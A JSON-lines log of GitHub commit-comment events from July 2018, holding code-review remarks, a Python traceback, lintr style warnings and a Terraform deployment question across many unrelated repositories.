{"id":"7916077138","type":"CommitCommentEvent","actor":{"login":"mercer1976"},"repo":{"name":"mercer1976/twitter4j"},"payload":{"comment":{"id":29589545,"position":null,"line":null,"path":null,"commit_id":"cbbac2408527a9de9fb6d83f10f18236235da9b0","created_at":"2018-07-04T03:43:25Z","updated_at":"2018-07-04T03:43:25Z","author_association":"OWNER","body":" twitter4j-core/src/main/java/twitter4j/TwitterBaseImpl.java\r\n @@ -33,7 +33,7 @@\r\n   * @author Yusuke Yamamoto - yusuke at mac.com\r\n   */\r\n  abstract class TwitterBaseImpl implements TwitterBase, java.io.Serializable, OAuthSupport, OAuth2Support, HttpResponseListener {\r\n -    private static final String WWW_DETAILS = \"See http://twitter4j.org/en/configuration.html for details\";\r\n +    private static final String WWW_DETAILS = \"See http://twitter4j.org/en/configuration.html for details. See and register at http://apps.twitter.com/\";\r\n      private static final long serialVersionUID = -7824361938865528554L;\r\n  \r\n      Configuration conf;"}},"created_at":"2018-07-04T03:43:25Z"}
{"id":"7916081600","type":"CommitCommentEvent","actor":{"login":"xinyu19961004"},"repo":{"name":"xinyu19961004/MySpace"},"payload":{"comment":{"id":29589559,"position":1,"line":1,"path":"index.md","commit_id":"59867dcb141ad684717e0a3f2e2e9332c41ce904","created_at":"2018-07-04T03:45:23Z","updated_at":"2018-07-04T03:45:23Z","author_association":"OWNER","body":"欢迎来到AirUpThere的网页"}},"created_at":"2018-07-04T03:45:23Z"}
{"id":"7916082645","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"Wrye-Code-Collection/Wrye-Flash-FalloutNV"},"payload":{"comment":{"id":29589560,"position":null,"line":null,"path":null,"commit_id":"d68ab15b9309551e3f7fbc2c0d4d52378560ad31","created_at":"2018-07-04T03:45:51Z","updated_at":"2018-07-04T03:45:51Z","author_association":"MEMBER","body":"@valda Do you have Fallout New Vegas installed to test Monitor External installation and tell me how it work? I can test it but I'd like to get more testing before build a new release since I just released 17.8 with NVSE JIP CTDA updates."}},"created_at":"2018-07-04T03:45:51Z"}
{"id":"7916085413","type":"CommitCommentEvent","actor":{"login":"mercer1976"},"repo":{"name":"mercer1976/twitter4j"},"payload":{"comment":{"id":29589562,"position":4,"line":118,"path":"readme.txt","commit_id":"cbbac2408527a9de9fb6d83f10f18236235da9b0","created_at":"2018-07-04T03:47:06Z","updated_at":"2018-07-04T03:47:06Z","author_association":"OWNER","body":"+Yuichiro Kawano <tresener.yu1ro at gmail.com> @tresener_yu1ro\r\n     \r\n Write\r\n+Yuichiro Kawano <tresener.yu1ro at gmail.com> @tresener_yu1ro\r\n     \r\n Write\r\n twitter4j-core/src/main/java/twitter4j/TwitterBaseImpl.java\r\n @@ -33,7 +33,7 @@\r\n   * @author Yusuke Yamamoto - yusuke at mac.com\r\n   */\r\n  abstract class TwitterBaseImpl implements TwitterBase, java.io.Serializable, OAuthSupport, OAuth2Support, HttpResponseListener {\r\n -    private static final String WWW_DETAILS = \"See http://twitter4j.org/en/configuration.html for details\";\r\n +    private static final String WWW_DETAILS = \"See http://twitter4j.org/en/configuration.html for details. See and register at http://apps.twitter.com/\";\r\n      private static final long serialVersionUID = -7824361938865528554L;\r\n  \r\n      Configuration conf;\r\n"}},"created_at":"2018-07-04T03:47:06Z"}
{"id":"7916089707","type":"CommitCommentEvent","actor":{"login":"yfujii01"},"repo":{"name":"keita-ito0221/test"},"payload":{"comment":{"id":29589569,"position":4,"line":54,"path":"EV3/Motor.cpp","commit_id":"f85aafdc9963ba4b99eaaa32577e2e75c9d21bd9","created_at":"2018-07-04T03:49:03Z","updated_at":"2018-07-04T03:49:03Z","author_association":"NONE","body":"ここは削除して良かったのでしょうか？"}},"created_at":"2018-07-04T03:49:03Z"}
{"id":"7916090633","type":"CommitCommentEvent","actor":{"login":"yfujii01"},"repo":{"name":"keita-ito0221/test"},"payload":{"comment":{"id":29589570,"position":4,"line":54,"path":"EV3/Motor.cpp","commit_id":"f85aafdc9963ba4b99eaaa32577e2e75c9d21bd9","created_at":"2018-07-04T03:49:28Z","updated_at":"2018-07-04T03:49:28Z","author_association":"NONE","body":"@yuto-nago \r\nここは削除して良かったのでしょうか？"}},"created_at":"2018-07-04T03:49:28Z"}
{"id":"7916091286","type":"CommitCommentEvent","actor":{"login":"mmaziesf"},"repo":{"name":"IanHarvey/bluepy"},"payload":{"comment":{"id":29589575,"position":null,"line":null,"path":null,"commit_id":"927e37c38a3ea91f838cef698d2bedf6a64cf0cc","created_at":"2018-07-04T03:49:44Z","updated_at":"2018-07-04T03:49:44Z","author_association":"NONE","body":"Thanks for the new commit. Btw, it returns the following error:\r\n\r\nTraceback (most recent call last):\r\n  File \"blescan.py\", line 140, in <module>\r\n    main()\r\n  File \"blescan.py\", line 122, in main\r\n    devices = scanner.scan(arg.timeout)\r\n  File \"/usr/local/lib/python2.7/dist-packages/bluepy-1.1.4-py2.7.egg/bluepy/btle.py\", line 734, in scan\r\n    self.process(timeout)\r\n  File \"/usr/local/lib/python2.7/dist-packages/bluepy-1.1.4-py2.7.egg/bluepy/btle.py\", line 723, in process\r\n    self.delegate.handleDiscovery(dev, (dev.updateCount <= 1), isNewData)\r\n  File \"blescan.py\", line 89, in handleDiscovery\r\n    for (sdid, desc, val) in dev.getScanData():\r\n  File \"/usr/local/lib/python2.7/dist-packages/bluepy-1.1.4-py2.7.egg/bluepy/btle.py\", line 655, in getScanData\r\n    for sdid in self.scanData.keys() ]\r\n  File \"/usr/local/lib/python2.7/dist-packages/bluepy-1.1.4-py2.7.egg/bluepy/btle.py\", line 650, in getValueText\r\n    return str(self.getValue(sdid))\r\n  File \"/usr/local/lib/python2.7/dist-packages/bluepy-1.1.4-py2.7.egg/bluepy/btle.py\", line 645, in getValue\r\n    return self._decodeUUID(val,16)\r\n  File \"/usr/local/lib/python2.7/dist-packages/bluepy-1.1.4-py2.7.egg/bluepy/btle.py\", line 622, in _decodeUUID\r\n    rs = (\"%02X\" % val[i]) + rs\r\nTypeError: %X format: a number is required, not str\r\n"}},"created_at":"2018-07-04T03:49:44Z"}
{"id":"7916099407","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29589584,"position":10,"line":87,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"d74c7ae78147c2b270ef7da85f8b9071ffe386fc","created_at":"2018-07-04T03:53:27Z","updated_at":"2018-07-04T03:53:27Z","author_association":"COLLABORATOR","body":"what's the update with the tracker status field?"}},"created_at":"2018-07-04T03:53:27Z"}
{"id":"7916101382","type":"CommitCommentEvent","actor":{"login":"manav28"},"repo":{"name":"manav28/youtube-8m"},"payload":{"comment":{"id":29589588,"position":null,"line":null,"path":null,"commit_id":"e8d6aebc1668570e8c490fc86a3f4eb653bbe3ad","created_at":"2018-07-04T03:54:26Z","updated_at":"2018-07-04T03:54:26Z","author_association":"OWNER","body":"Config file for TPU support"}},"created_at":"2018-07-04T03:54:26Z"}
{"id":"7916104961","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29589593,"position":null,"line":null,"path":null,"commit_id":"60174a96f4708db7498625a3e99a10d966cc0001","created_at":"2018-07-04T03:56:11Z","updated_at":"2018-07-04T03:56:11Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-04T03:56:11Z"}
{"id":"7916105933","type":"CommitCommentEvent","actor":{"login":"drochetti"},"repo":{"name":"esdoc/esdoc-plugins"},"payload":{"comment":{"id":29589599,"position":5,"line":244,"path":"esdoc-typescript-plugin/src/Plugin.js","commit_id":"0b39ea04b20b5cadcf3264e5e98d5ab526abd461","created_at":"2018-07-04T03:56:38Z","updated_at":"2018-07-04T03:56:38Z","author_association":"NONE","body":"Shouldn't this be `'any'`?"}},"created_at":"2018-07-04T03:56:38Z"}
{"id":"7916114672","type":"CommitCommentEvent","actor":{"login":"ShurBucket"},"repo":{"name":"ShurBucket/Shorting-Option-Contracts"},"payload":{"comment":{"id":29589627,"position":null,"line":null,"path":null,"commit_id":"4317434e4ed552e2e7983b968db8471835402ca2","created_at":"2018-07-04T04:00:34Z","updated_at":"2018-07-04T04:00:34Z","author_association":"OWNER","body":"So far so good"}},"created_at":"2018-07-04T04:00:34Z"}
{"id":"7916117597","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29589632,"position":null,"line":null,"path":null,"commit_id":"b6e701e9fbd98d29afdc25c9ce09cc9320a94372","created_at":"2018-07-04T04:01:51Z","updated_at":"2018-07-04T04:01:51Z","author_association":"OWNER","body":"opa da tochno kak ne zametil"}},"created_at":"2018-07-04T04:01:51Z"}
{"id":"7916124278","type":"CommitCommentEvent","actor":{"login":"Sampletest1"},"repo":{"name":"Sampletest1/Test"},"payload":{"comment":{"id":29589641,"position":null,"line":null,"path":null,"commit_id":"29fdfa30c0dffb5ce531006500eff9f2ab00aa34","created_at":"2018-07-04T04:04:58Z","updated_at":"2018-07-04T04:04:58Z","author_association":"OWNER","body":"ee"}},"created_at":"2018-07-04T04:04:58Z"}
{"id":"7916129164","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/NetLogoR"},"payload":{"comment":{"id":29589656,"position":null,"line":null,"path":null,"commit_id":"bc3a18ff2853838085c6bc1b287c04e74b0f1437","created_at":"2018-07-04T04:07:16Z","updated_at":"2018-07-04T04:07:16Z","author_association":"NONE","body":"[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:64:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L64) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.WolfSheepPredation <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:113:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L113) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationInit <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:185:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L185) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationSave <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:200:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L200) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPosition <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:220:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L220) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPopSize <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:243:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationEvent <- function(sim){\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:15:12:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L15) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  function(.Object=\"agentMatrix\", coords, ..., levelsAM) {\n           ^~~~~~~\n```\n[R/agentMatrix-Class-methods.R:16:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L16) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Coords <- TRUE\n    ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:29:7:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L29) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      Coords <- FALSE\n      ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:395:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L395) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(j, nam)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:396:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L396) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(nam, j)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:397:34:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L397) *style:* **Commented code should be removed.**\n```r\n​    numCols <- which(!charCols) #colNums[!(colNums %in% charCols)]\n                                 ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:404:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L404) *style:* **Commented code should be removed.**\n```r\n​      #numColsJ <- which(colNums %in% numCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:409:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L409) *style:* **Commented code should be removed.**\n```r\n​      #charColsJ <- which(colNums %in% charCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L609) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​head.agentMatrix <- function(x, n = 6L, ...) {\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:617:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L617) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​tail.agentMatrix <- function(x, n = 6L, ...) {\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:638:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L638) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​cbind.agentMatrix <- function(..., deparse.level) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:662:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L662) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​rbind.agentMatrix <- function(..., deparse.level = 1) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1537:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1537) *style:* **Lines should not be more than 100 characters.**\n```r\n​        pOverL <- over(pBuffer, SpatialPoints(coords = agents2cAll, proj4string = .projNowhere), returnList = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1549:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1549) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       SpatialPoints(coords = agents2@.Data[, c(\"xcor\", \"ycor\"), drop = FALSE], proj4string = .projNowhere),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/patch-functions.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/patch-functions.R#L609) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @seealso \\url{https://ccl.northwestern.edu/netlogo/docs/dictionary.html#patch-at-heading-and-distance}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plot.R:37:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/plot.R:53:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/quickPlot.R:179:39:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/quickPlot.R#L179) *style:* **Commas should always have a space after.**\n```r\n​    grobToPlot@.Data <- toPlot@.Data[,,sGrob@layerName];\n                                      ^\n```\n[R/world-functions.R:517:25:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L517) *style:* **Put spaces around all infix operators.**\n```r\n​          mid <- floor(n/2)\n                       ~^~\n```\n[R/world-functions.R:534:9:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L534) *style:* **Commented code should be removed.**\n```r\n​    #   cat(\"names       :\", paste(ln, collapse=\", \"), \"\\n\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/world-functions.R:538:28:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                           ^\n```\n[R/world-functions.R:538:32:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                               ^\n```\n[R/worldNLR-classes-methods.R:340:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/worldNLR-classes-methods.R#L340) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    NLwMs <- list(...)\n    ^~~~~\n```\n[tests/testthat/test-plotting.R:6:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/tests/testthat/test-plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  t1_0 <- createTurtles(n = 10, coords = cbind(rep(0, 10), rep(0, 10)))\n  ^~~~\n```"}},"created_at":"2018-07-04T04:07:16Z"}
{"id":"7916136231","type":"CommitCommentEvent","actor":{"login":"Rahcmihc"},"repo":{"name":"Rahcmihc/hello-world"},"payload":{"comment":{"id":29589670,"position":2,"line":2,"path":"README.md","commit_id":"759b5eeb5e85f9f8814e1e2e933ed8b2dd56da36","created_at":"2018-07-04T04:10:39Z","updated_at":"2018-07-04T04:10:39Z","author_association":"OWNER","body":"oh"}},"created_at":"2018-07-04T04:10:39Z"}
{"id":"7916139359","type":"CommitCommentEvent","actor":{"login":"ningyuansg"},"repo":{"name":"source-academy/cadet"},"payload":{"comment":{"id":29589679,"position":24,"line":29,"path":"terraform/cadet/inputs.tf","commit_id":"d2cb217e79917320c24b08ee3128cdaf39c94eeb","created_at":"2018-07-04T04:12:10Z","updated_at":"2018-07-04T04:12:10Z","author_association":"MEMBER","body":"So, to double-check, the terraform deployment workflow is\r\n\r\n1. With terraform, create prod RDS with default password, and prod IAM role for api; can set aws launch configuration to a default nginx ami\r\n2. Change the RDS password and encrypt with KMS\r\n3. Generate AWS access id and key for prod api IAM role\r\n4. Bake api AMIs with api IAM AWS access id and keys in env variables\r\n5. Change the AMI id of autoscaling group in (1) to (4)"}},"created_at":"2018-07-04T04:12:10Z"}
{"id":"7916140798","type":"CommitCommentEvent","actor":{"login":"Khyto94"},"repo":{"name":"Khyto94/aula1"},"payload":{"comment":{"id":29589688,"position":null,"line":null,"path":null,"commit_id":"2a12ff04723a589a6827ab1e7e498a6cab805246","created_at":"2018-07-04T04:12:51Z","updated_at":"2018-07-04T04:12:51Z","author_association":"OWNER","body":"projecto"}},"created_at":"2018-07-04T04:12:51Z"}
{"id":"7916174703","type":"CommitCommentEvent","actor":{"login":"7ssaa"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29589750,"position":21,"line":21,"path":"test2.py","commit_id":"c1400fe65b4ad6be97c0d4b8d76f9ef6d4fb6825","created_at":"2018-07-04T04:28:36Z","updated_at":"2018-07-04T04:28:36Z","author_association":"OWNER","body":"thanks!"}},"created_at":"2018-07-04T04:28:36Z"}
{"id":"7916174849","type":"CommitCommentEvent","actor":{"login":"ylemkimon"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29589752,"position":28,"line":28,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T04:28:39Z","updated_at":"2018-07-04T04:28:39Z","author_association":"COLLABORATOR","body":"@kevinbarabash This removes the `ParseError` constructor."}},"created_at":"2018-07-04T04:28:39Z"}
{"id":"7916179596","type":"CommitCommentEvent","actor":{"login":"ylemkimon"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29589765,"position":110,"line":42,"path":"test/setup.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T04:30:48Z","updated_at":"2018-07-04T04:30:48Z","author_association":"COLLABORATOR","body":"@kevinbarabash Yes, it is a `string` to match the `ParseError`. It is used in the `error-spec.js`."}},"created_at":"2018-07-04T04:30:48Z"}
{"id":"7916179666","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589766,"position":1,"line":8,"path":"lesson4/cargo_train.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T04:30:49Z","updated_at":"2018-07-04T04:30:49Z","author_association":"NONE","body":"во первых строках письма ))\r\nя тут заметил, что ты новые папки не создаешь, что не очень удобно для проверки\r\nдля каждого урока создавай новую директорию, пожалуйста, как ты делал до 4-го задания"}},"created_at":"2018-07-04T04:30:49Z"}
{"id":"7916181281","type":"CommitCommentEvent","actor":{"login":"LongChair"},"repo":{"name":"plexinc/plex-media-player"},"payload":{"comment":{"id":29589769,"position":null,"line":null,"path":null,"commit_id":"7c3a9b3c74b43c6e39724d6caab44085f3bc2baf","created_at":"2018-07-04T04:31:31Z","updated_at":"2018-07-04T04:31:31Z","author_association":"CONTRIBUTOR","body":"Functionally looks OK but could be simpler in terms of code :)\r\nRather than issystemnameepmty can you just test systemname.isempty without adding an extra variable ?\r\nYou could probably just use the settings value if not empty and make code quite simpler with something like :\r\n\r\nIf (!systemname.isempty)\r\n  Ressource... = systemname;\r\n\r\nOne more nitpick, I think PMP uses ´bool’ rather than ´Boolean’ for type everywhere else.\r\n"}},"created_at":"2018-07-04T04:31:31Z"}
{"id":"7916183907","type":"CommitCommentEvent","actor":{"login":"ylemkimon"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29589774,"position":151,"line":149,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T04:32:45Z","updated_at":"2018-07-04T04:32:45Z","author_association":"COLLABORATOR","body":"@kevinbarabash `expectFail` is a boolean. It is no longer used in later commits."}},"created_at":"2018-07-04T04:32:45Z"}
{"id":"7916184600","type":"CommitCommentEvent","actor":{"login":"locxtronic"},"repo":{"name":"locxtronic/VB.Net-IP-Camera-Control"},"payload":{"comment":{"id":29589779,"position":null,"line":null,"path":null,"commit_id":"1379e0efd5328d4c5acc9b4147adebb1a2e08165","created_at":"2018-07-04T04:33:06Z","updated_at":"2018-07-04T04:33:06Z","author_association":"OWNER","body":"you can find those file in debug folder.\r\nhttps://github.com/locxtronic/VB.Net-IP-Camera-Control/tree/master/VB%20RC%20Robot/obj/x86/Debug"}},"created_at":"2018-07-04T04:33:06Z"}
{"id":"7916185524","type":"CommitCommentEvent","actor":{"login":"ylemkimon"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29589781,"position":118,"line":124,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T04:33:32Z","updated_at":"2018-07-04T04:33:32Z","author_association":"COLLABORATOR","body":"@kevinbarabash Yes. It captures current stack trace into `e.stack` excluding `mode.get`."}},"created_at":"2018-07-04T04:33:32Z"}
{"id":"7916187348","type":"CommitCommentEvent","actor":{"login":"ylemkimon"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29589785,"position":108,"line":122,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T04:34:28Z","updated_at":"2018-07-04T04:34:28Z","author_association":"COLLABORATOR","body":"@kevinbarabash This way, it can reuse the error message from `expectKaTeX`."}},"created_at":"2018-07-04T04:34:28Z"}
{"id":"7916188530","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589790,"position":10,"line":12,"path":"lesson4/route.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T04:35:03Z","updated_at":"2018-07-04T04:35:03Z","author_association":"NONE","body":"традиционно этот метод называют `validate!`, а не  `validation!`\r\nпоправь везде"}},"created_at":"2018-07-04T04:35:03Z"}
{"id":"7916190574","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589797,"position":38,"line":64,"path":"lesson4/route.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T04:36:02Z","updated_at":"2018-07-04T04:36:02Z","author_association":"NONE","body":"будет даже правильней `true` унести из метода `validate!` в метод `valid?`, поместив после строки с вызовом `validate!`"}},"created_at":"2018-07-04T04:36:02Z"}
{"id":"7916196392","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589807,"position":40,"line":66,"path":"lesson4/route.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T04:38:48Z","updated_at":"2018-07-04T04:38:48Z","author_association":"NONE","body":"ты проверяешь какой-то не сильно важный аттрибут, на какую-то не очень важную характеристику...\r\nну по крайней мере для текущей программы не важно в каком формате будет номер, код нигде не упадет, если номер будет в неверном формате\r\n\r\nпри этом можно добавить в этот класс еще проверок, гораздо более интересных и потенциально важных\r\nнапример поразмышляй над такими вопросами:\r\n- может стоит проверить являются ли объекты, передаваемые в качестве аргументов при создании маршрута, объектами класса Stations ?\r\n- а будет ли роут валидным,  если пользователь передаст два раза одну и ту же станцию, т.е. два идентичных объекта ?"}},"created_at":"2018-07-04T04:38:48Z"}
{"id":"7916198606","type":"CommitCommentEvent","actor":{"login":"foolmadao"},"repo":{"name":"foolmadao/html-learn-code"},"payload":{"comment":{"id":29589812,"position":null,"line":null,"path":null,"commit_id":"351f676de51813158d6d89b1b120798abba95429","created_at":"2018-07-04T04:39:49Z","updated_at":"2018-07-04T04:39:49Z","author_association":"OWNER","body":"rt"}},"created_at":"2018-07-04T04:39:49Z"}
